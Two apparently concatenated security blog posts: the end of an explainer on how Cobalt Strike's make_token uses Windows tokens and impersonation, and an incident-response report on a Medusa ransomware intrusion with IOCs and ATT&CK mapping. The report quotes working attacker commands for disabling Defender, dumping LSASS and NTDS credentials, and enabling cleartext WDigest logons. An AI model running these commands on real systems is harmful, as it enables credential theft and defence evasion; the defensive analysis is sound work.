When a user authenticates to a Windows system, a process similar to the image below occurs. At a high level, the user’s credentials are validated by the appropriate authentication package, typically Kerberos or NTLM. A new logon session is then created with a unique identifier, and the identifier along with information about the user is sent to the Local Security Authority (LSA) component. Finally, LSA uses this information to create an access token for the user.

Figure 11 - Windows authentication flow

Regarding access tokens, they are objects that represent the local security context of an account and are always associated with a process or thread of the system. These objects contain information about the user such as their security identifier, privileges, or the groups to which they belong. Windows performs access control decisions based on the information provided by access tokens and the rules configured in the discretionary access control list (DACL) of target objects.

An example is shown below where two processes – one from Attl4s and one from Wint3r – attempt to read the “passwords.txt” file. As can be seen, the Attl4s process is able to read the file due to the second rule (Attl4s is a member of Administrators), while the Wint3r process is denied access because of the first rule (Wint3r has identifier 1004).

Figure 12 - Windows access controls

Regarding logon sessions, their importance stems from the fact that if an authentication results in cached credentials, they will be associated with a logon session. The purpose of cached credentials is to enable Windows to provide a single sign-on (SSO) experience where the user does not need to re-enter their credentials when accessing a remote service, such as a shared folder on the network.

As an interesting note, when Mimikatz dumps credentials from Windows authentication packages (e.g., sekurlsa::logonpasswords), it iterates through all the logon sessions in the system to extract their information.

The following image illustrates the relationship between processes, tokens, logon sessions, and cached credentials:

Figure 13 - Relationship between processes, threads, tokens, logon sessions and cached credentials

The key takeaways are:

  • Access tokens represent the local security context of an authenticated user. The information in these objects is used by the local system to make access control decisions
  • Logon sessions with cached credentials represent the network security context of an authenticated user. These credentials are automatically and transparently used by Windows when the user wants to access remote services that support Windows authentication

What runas /netonly and make_token do under the hood is creating an access token similar to the one of the current user (Yamcha) along with a logon session containing the credentials of the alternate user (Bulma). This enables the dual identity behaviour where the local identity remains the same, while the network identity changes to that of the alternate user.

Figure 14 - Yamcha access token linked to logon session with Bulma credentials

As stated before, the fact that runas netonly or make_token do not validate credentials has many benefits. For example we can use credentials for users who have been denied local access, and also for accounts that the local system does not know and cannot validate (e.g. a local user from other computer or an account from an untrusted domain). Additionally, we can create “sacrificial” logon sessions with invalid credentials, which allows us to manipulate Kerberos tickets without overwriting the ones stored in the original logon session. 

However, this lack of validation can also result in unpleasant surprises, for example in the case of a company using an authenticated proxy. If we make a mistake when inserting credentials to make_token, or create sacrificial sessions carelessly, we can end up with locked accounts or losing our Beacon because it is no longer able to exit through the proxy!

Administrative Context or Not!?

Raphael mentioned that, in order to use a token created by make_token, an administrative context was needed.

“The problem with make_token, as much as steal_token, is it requires you to be in an administrator context before you can actually do anything with that token”

Do we really need an administrative context? The truth is there are situations where this statement is not entirely accurate.

As far as we know, the make_token command uses the LogonUserA function (along with the LOGON32_LOGON_NEW_CREDENTIALS flag) to create a new access token similar to that of the user, but linked to a new logon session containing the alternate user’s credentials. The command does not stop there though, as LogonUserA only returns a handle to the new token; we have to do something with that token!

Let’s suppose our goal is to create new processes with the context of the new token.

Creating Processes with a Token

If we review the Windows API, we will spot two functions that support a token handle as an argument to create a new process:

Reading the documentation of these functions, however, will show the following statements:

“Typically, the process that calls the CreateProcessAsUser function must have the SE_INCREASE_QUOTA_NAME privilege and may require the SE_ASSIGNPRIMARYTOKEN_NAME privilege if the token is not assignable.”

“The process that calls CreateProcessWithTokenW must have the SE_IMPERSONATE_NAME privilege.”

This is where Raphael’s statement makes sense. Even if we can create a token with a non-privileged user through LogonUserA, we will not be able to use that token to create new processes. To do so, Microsoft indicates we need administrative privileges such as SE_ASSIGNPRIMARYTOKEN_NAME, SE_INCREASE_QUOTA_NAME or SE_IMPERSONATE_NAME.

When using make_token in a non-privileged context and attempting to create a process (e.g., shell dir \dc01.capsule.corp\C$), Beacon will silently fail and fall back to ignoring the token to create the process. That’s one of the reasons why sometimes it appears that the impersonation is not working properly.

As a note, agents like Meterpreter do give more information about the failure:

Figure 15 - Impersonation failed

As such, we could rephrase Raphael’s statement as follows:

“The problem with make_token is it requires you to be in an administrator context before you can actually create processes with that token”

The perceptive reader may now wonder… What happens if I operate within my current process instead of creating new ones? Do I still need administrative privileges?

Access Tokens + Thread Impersonation

The Windows API provides functions like ImpersonateLoggedOnUser or SetThreadToken to allow a thread within a process to impersonate the security context provided by an access token.

Figure 16 - ImpersonateLoggedOnUser

In addition to keeping the token handle for future process creations, make_token also employs functions like these to acquire the token’s security context in the thread where Beacon is running. Do we need administrative privileges for this? Not at all.

As can be seen in the image below, we meet point number three:

Figure 17 - When is impersonation allowed in Windows

This means that any command or tool executed from the thread where Beacon is running will benefit from the security context created by make_token, without requiring an administrative context. This includes many of the native commands, as well as capabilities implemented as Beacon Object Files (BOFs).

Figure 18_01 - Beacon capabilities benefiting from the security context of the tokenFigure 18_02 - Beacon capabilities benefiting from the security context of the token

Closing Thoughts

Considering all the information above, we could do a more detailed description of make_token as follows:

The make_token command creates an access token similar to the one of the current user, along with a logon session containing the credentials specified as arguments. This enables a dual identity where nothing changes locally (we remain the same user), but in the network we will be represented by the credentials of the alternate user (note that make_token does not validate the credentials specified). Once the token is created, Beacon impersonates it to benefit from the new security context when running inline capabilities.

The token handle is also stored by Beacon to be used in new process creations, which requires an administrative context. If a process creation is attempted with an unprivileged user, Beacon will ignore the token and fall back to a regular process creation.

As a final note, we would like to point out that in 2019 Raphael Mudge released a new version of his awesome Red Team Ops with Cobalt Strike course. In the eighth video, make_token was once again discussed, but this time showing a demo with an unprivileged user. While this demonstrated that running the command did not require an administrative context, it did not explain much more about it.

We hope this article has answered any questions you may have had about make_token.

Sources

Don’t throw a hissy fit; defend against Medusa

13 November 2023 at 14:01

Unveiling the Dark Side: A Deep Dive into Active Ransomware Families 

Author: Molly Dewis 

Intro 

Our technical experts have written a blog series focused on Tactics, Techniques and Procedures (TTP’s) deployed by four ransomware families recently observed during NCC Group’s incident response engagements.   

In case you missed it, our last post analysed an Incident Response engagement involving the D0nut extortion group. In this instalment, we take a deeper dive into the Medusa. 

Not to be confused with MedusaLocker, Medusa was first observed in 2021, is a Ransomware-as-a-Service (RaaS) often using the double extortion method for monetary gain. In 2023 the groups’ activity increased with the launch of the ‘Medusa Blog’. This platform serves as a tool for leaking data belonging to victims. 

Summary 

This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving Medusa Ransomware.  

Below provides a summary of findings which are presented in this blog post: 

  • Use of web shells to maintain access. 
  • Utilising PowerShell to conduct malicious activity. 
  • Dumping password hashes.  
  • Disabling antivirus services.  
  • Use of Windows utilises for discovery activities.  
  • Reverse tunnel for C2. 
  • Data exfiltration.  
  • Deployment of Medusa ransomware. 

Medusa  

Medusa ransomware is a variant that is believed to have been around since June 2021 [1]. Medusa is an example of a double-extortion ransomware where the threat actor exfiltrates and encrypts data. The threat actor threatens to release or sell the victim’s data on the dark web if the ransom is not paid. This means the group behind Medusa ransomware could be characterised as financially motivated. Victims of Medusa ransomware are from no particular industry suggesting the group behind this variant have no issue with harming any organisation.  

Incident Overview 

Initial access was gained by exploiting an external facing web server. Webshells were created on the server which gave the threat actor access to the environment. From initial access to the execution of the ransomware, a wide variety of activity was observed such as executing Base64 encoded PowerShell commands, dumping password hashes, and disabling antivirus services. Data was exfiltrated and later appeared on the Medusa leak site.  

Timeline 

T – Initial Access gained via web shells.  

T+13 days – Execution activity. 

T+16 days – Persistence activity. 

T+164 days – Defense Evasion activity. 

T+172 days – Persistence and Discovery activity. 

T+237 days – Defense Evasion and Credential Access Activity started. 

T+271 days – Ransomware Executed.  

Mitre TTPs 

Initial Access 

The threat actor gained initial access by exploiting a vulnerable application hosted by an externally facing web server. Webshells were deployed to gain a foothold in the victim’s environment and maintain access.  

Execution 

PowerShell was leveraged by the threat actor to conduct various malicious activity such as:   

  • Downloading executables  
    • Example: powershell.exe -noninteractive -exec bypass powershell -exec bypass -enc … 
  • Disabling Microsoft Defender 
    • Example: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path ‘HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender’ -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force; 
  • Deleting executables 
    • Example: powershell.exe -noninteractive -exec bypass del C:\\PRogramdata\\re.exe 
  • Conducting discovery activity  
    • Example: powershell.exe -noninteractive -exec bypass net group domain admins /domain 

Windows Management Instrumentation (WMI) was utilised to remotely execute a cmd.exe process: wmic /node:<IP ADDRESS> / user:<DOMAIN\\USER> /password:<REDACTED> process call create ‘cmd.exe’. 

Scheduled tasks were used to execute c:\\programdata\\a.bat. It is not known exactly what a.bat was used for, however, analysis of a compiled ASPX file revealed the threat actor had used PowerShell to install anydesk.msi.  

  • powershell Invoke-WebRequest -Uri hxxp://download.anydesk[.]com/AnyDesk.msi -OutFile anydesk.msi 
  • msiExec.exe /i anydesk.msi /qn 

A cmd.exe process was started with the following argument list: c:\\programdata\\a.bat’;start-sleep 15;ps AnyDeskMSI 

Various services were installed by the threat actor. PDQ Deploy was installed to deploy LAdHW.sys, a kernel driver which disabled antivirus services. Additionally, PSEXESVC.exe was installed on multiple servers. On one server, it was used to modify the firewall to allow WMI connections.   

Persistence 

Maintaining access to the victim’s network was achieved by creating a new user admin on the external facing web server (believed to be the initial access server). Additionally, on the two external facing web servers, web shells were uploaded to establish persistent access and execute commands remotely. JavaScript-based web shells were present on one web server and the GhostWebShell [2] was found on the other. The GhostWebShell is fileless however, its compiled versions were saved in C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH>. 

Defence Evasion 

Evading detection was one of the aims for this threat actor due to the various defence evasion techniques utilised. Antivirus agents were removed from all affected hosts including the antivirus server. Microsoft Windows Defender capabilities were disabled by the threat actor using: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path ‘HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender’ -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;.  

Additionally, LAdHW.sys, a signed kernel mode driver was installed as a new service to disable antivirus services. The following firewall rule was deleted: powershell.exe -Command amp; {Remove-NetFirewallRule -DisplayName \”<Antivirus Agent Firewall Rule Name>\” 

The threat actor obfuscated their activity. Base64 encoded PowerShell commands were utilised to download malicious executables. It should be noted many of these executables such as JAVA64.exe and re.exe were deleted after use. Additionally, Sophos.exe (see below) which was packed with Themida, was executed.  

Figure 1 – Sophos.exe.
Figure 1 – Sophos.exe. 

The value of HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest\\UseLogonCredential was modified to 1 so that logon credentials were stored in cleartext. This enabled the threat actor to conduct credential dumping activities. 

Credential Access 

The following credential dumping techniques were utilised by the threat actor:  

  • Using the Nishang payload to dump password hashes. Nishang is a collection of PowerShell scripts and payloads. The Get-PassHashes script, which requires admin privileges, was used.  
  • Mimikatz was present on one of the external facing web servers, named as trust.exe. A file named m.txt was identified within C:\Users\admin\Desktop, the same location as the Mimikatz executable. 
  • An LSASS memory dump was created using the built-in Windows tool, comsvcs.dll. 
    • powershell -exec bypass -c “rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ((ps lsass).id) C:\programdata\test.png full 
  • he built-in Windows tool ntdsutil.exe was used to extract the NTDS:  
    • powershell ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full c:\programdata\nt’ q q 

Discovery 

The threat actor conducted the following discovery activity: 

Type of discovery activity Description 
nltest /trusted_domains Enumerates domain trusts 
net group ‘domain admins’ /domain Enumerates domain groups 
net group ‘domain computers’ / domain Enumerates domain controllers 
ipconfig /all Learn about network configuration and settings 
tasklist Displays a list of currently running processes on a computer 
quser Show currently logged on users 
whoami Establish which user they were running as 
wmic os get name Gathers the name of the operating system 
wmic os get osarchitecture Establishes the operating system architecture 

Lateral Movement 

Remote Desktop Protocol (RDP) was employed to laterally move through the victim’s network. 

Command and Control 

A reverse tunnel allowed the threat actor to establish a new connection from a local host to a remote host. The binary c:\programdata\re.exe was executed and connected to 134.195.88[.]27 over port 80 (HTTP). Threat actors tend to use common protocols to blend in with legitimate traffic which can be seen in this case, as port 80 was used. 

Additionally, the JWrapper Remote Access application was installed on various servers to maintain access to the environment. AnyDesk was also utilised by the threat actor.  

Exfiltration 

Data was successfully exfiltrated by the threat actor. The victim’s data was later published to the Medusa leak site.  

Impact 

The Medusa ransomware in the form of gaze.exe, was deployed to the victim’s network. Files were encrypted, and .MEDUSA was appended to file names. The ransom note was named !!!READ_ME_MEDUSA!!!.txt. System recovery was inhibited due to the deletion of all VMs from the Hyper-V storage as well as local and cloud backups.  

Indicators of Compromise 

IOC Value Indicator Type Description  
webhook[.]site Domain Malicious webhook 
bashupload[.]com Domain Download JAVA64.exe and RW.exe 
tmpfiles[.]org Domain Download re.exe 
134.195.88[.]27:80 IP:PORT C2 
8e8db098c4feb81d196b8a7bf87bb8175ad389ada34112052fedce572bf96fd6 SHA256 trust.exe (Mimikatz.exe) 
3e7529764b9ac38177f4ad1257b9cd56bc3d2708d6f04d74ea5052f6c12167f2 SHA256 JAVA_V01.exe  
f6ddd6350741c49acee0f7b87bff7d3da231832cb79ae7a1c7aa7f1bc473ac30 SHA256 testy.exe / gmer_th.exe  
63187dac3ad7f565aaeb172172ed383dd08e14a814357d696133c7824dcc4594 SHA256 JAVA_V02.exe  
781cf944dc71955096cc8103cc678c56b2547a4fe763f9833a848b89bf8443c6  SHA256 Sophos.exe 
C:\Users\Sophos.exe File Path Sophos.exe 
C:\Users\admin\Desktop\ File Path trust.exe JAVA_V01.exe testy.exe gmer_th.exe JAVA_V02.exe 
C:\ProgramData\JWrapper-Remote Access\ File Path JWrapper files 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH> File Path GhostWebshell compiled files 
C:\Windows\PSEXESVC.exe File Path PsExec 
C:\Users\<USERS>\AppData\Local\Temp\LAdHW.sys File Path Disables AV 
C:\Windows\AdminArsenal\PDQDeployRunner\service-1\PDQDeployRunner-1.exe File Path PDQDeployRunner – used to deploy LAdHW.sys 
C:\Users\<USER>\AppData\Local\Temp\2\gaze.exe C:\Windows\System32\gaze.exe File Path Ransomware executable 

MITRE ATT CK® 

Tactic Technique ID Description  
Initial Access Exploit Public-Facing Application T1190 A vulnerable application hosted by an external facing web server was exploited .  
Execution  Windows Management Instrumentation T1047 WMI used to remotely execute a cmd.exe process.  
Execution  Scheduled Task/Job: Scheduled Task T1053.005 Execute a.bat 
Execution  Command and Scripting Interpreter: PowerShell T1059.001 PowerShell was leveraged to execute malicious commands.  
Execution  Software Deployment Tools T1072 PDQ Deploy was installed to deploy LAdHW.sys. 
Execution System Services: Service Execution T1569.002 PsExec was installed as a service.  
Persistence Create Account: Domain Account T1136.0012 A new user ‘admin’ was created to maintain access.  
Persistence Server Software Component: Web Shell T1505.003 Web shells were utilised to maintain access.  
Defense Evasion Obfuscated Files or Information: Software Packing T1027.002 Sophos.exe was packed with Themida. 
Defense Evasion  Indicator Removal: File Deletion T1070.004 Malicious executables were deleted after use.   
Defense Evasion Indicator Removal: Clear Persistence T1070.009 Malicious executables were deleted after use.   
Defense Evasion Obfuscated Files or Information T1027 Base64 encoded PowerShell commands were utilised to download malicious executables.  
Defense Evasion  Modify Registry T1112 The WDigest registry key was modified to enable credential dumping activity. 
Defense Evasion Impair Defenses: Disable or Modify Tools T1562.001 Antivirus services were disabled.  
Defense Evasion Impair Defenses: Disable or Modify System Firewall T1562.004 Firewall rules were deleted.  
Credential Access OS Credential Dumping: LSASS Memory T1003.001 Mimikatz was utilised.  An LSASS memory dump was created.  
Credential Access OS Credential Dumping: NTDS T1003.003 Ntdsutil.exe was used to extract the NTDS. 
Discovery Domain Trust Discovery T1482 Nltest was used to enumerate domain trusts.  
Discovery Permission Groups Discovery: Domain Groups T1069.002 Net was used to enumerate domain groups. 
Discovery System Network Configuration Discovery T1016 Ipconfig was used to learn about network configurations.  
Discovery System Service Discovery T1007 Tasklist was used to display running processes.  
Discovery Remote System Discovery T1018 Net was used to enumerate domain controllers.  
Discovery System Owner/User Discovery T1033 Quser was used to show logged in users. Whoami was used to establish which user the threat actor was running as.  
Discovery System Information Discovery T1082 Wmic was used to gather the name of the operating system and its architecture.  
Lateral Movement  Remote Services: Remote Desktop Protocol T1021.001 RDP was used to laterally move through the environment.  
Command and Control Ingress Tool Transfer T1105 PowerShell commands were used to download and execute malicious files.  
Command and Control Remote Access Software T1219 JWrapper and AnyDesk were leveraged. 
Command and Control Protocol Tunnelling T1572 A reverse tunnel was established.   
Exfiltration  Exfiltration TA0010 Data was exfiltrated and published to the leak site.  
Impact  Data Encrypted for Impact T1486 Medusa ransomware was deployed. 
Impact Inhibit System Recovery T1490 VMs from the Hyper-V storage and local and cloud backups were deleted.  

References 

[1] https://www.bleepingcomputer.com/news/security/medusa-ransomware-gang-picks-up-steam-as-it-targets-companies-worldwide/  

[2] https://www.mdsec.co.uk/2020/10/covert-web-shells-in-net-with-read-only-web-paths/ 

❌
❌